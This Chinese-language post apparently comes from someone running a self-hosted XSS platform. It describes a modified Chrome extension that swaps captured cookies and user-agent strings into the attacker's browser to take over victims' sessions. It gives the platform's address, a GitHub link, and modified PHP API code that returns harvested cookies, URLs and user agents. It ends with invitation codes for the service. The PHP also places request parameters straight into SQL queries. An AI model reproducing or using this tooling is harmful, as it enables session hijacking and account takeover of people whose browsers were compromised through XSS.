原先一直用xss.hk結果不知怎么被關的,正好手上有代碼於是自己搭了一個,網上的類似的xss平台大多一樣,原先的xss的chrome插件,不適合 "manifest_version": 2,
而且很多其他的xss平台直接把代碼拿過來,chrome插件的里面的許多代碼內容跟xss.me這個與域名綁定的,而且有些加密cookie里面有瀏覽器的ua信息綁定,所以只用插件替換cookie有時候無法達到效果,否則得借助第三方修改header的插件,我們希望的是完全模擬劫持到的瀏覽器會話。
於是有了這一次的修改,php那把在/do/auth的那個接口返回增加了劫持ua的信息,點擊口修改當前瀏覽器cookie跟ua來劫持會話。
數據放在別人那總歸不放心,當然你也可以只用插件,填你自己的接口的信息,你只用插件來劫持會話,我也不會知道你的數據,不過你得稍微修改下php后台的的接口。
平台地址:
因被公司和諧,域名轉到原先的賬號依然存在 code4liet.duapp.com
chrome xss mitm attack插件代碼地址
https://github.com/lietdai/xss-mitm-attack
修改后的do.php
<?php /** * api.php 接口 * ---------------------------------------------------------------- * OldCMS,site:http://www.oldcms.com */ if(!defined('IN_OLDCMS')) die('Access Denied'); $auth=Val('auth','GET'); $db=DBConnect(); $project=$db->FirstRow("SELECT * FROM ".Tb('project')." WHERE authCode='{$auth}'"); if(empty($project)) exit('Auth Err.'); switch($act){ case 'content': default: $domain=Val('domain','GET'); $where=''; if(!empty($domain)) $where.=" AND domain='{$domain}'"; $res=$db->Dataset("SELECT content,serverContent FROM ".Tb('project_content')." WHERE projectId='{$project[id]}' {$where} ORDER BY id DESC"); $data=array(); foreach($res as $k=>$v){ $row=array(); $content=json_decode($v['content'],true); $serverContent = json_decode($v['serverContent'],true); $row['url']=$content['opener']?$content['opener']: $content['toplocation']; $row['cookie']=$content['cookie']; $serverContent = json_decode($v['serverContent'],true); $row['ua'] = $serverContent['HTTP_USER_AGENT']?:""; $data[]=$row; } echo JsonEncode($data); break; } ?>
發幾個邀請碼
71ac500c5a331cb7b2806a8e817f1672
34f3f778fa77c0f7fe8efb162ae70db0
df8825cf489fbca96a4663262afd02e1
65d17af1988fdde9f81696105c0ce3eb
4bdf5873cc19e995a925cbf203fdeeba
a66411d043503ea0bfe106a98a093c59
0695d3e66ab68d2b6d88949cbaf575c3
fb92a90b9a8264862699ed04a7d432a4
d358e24bc7ce3e81c73d54dbbb8b1195
禁止x政教=。=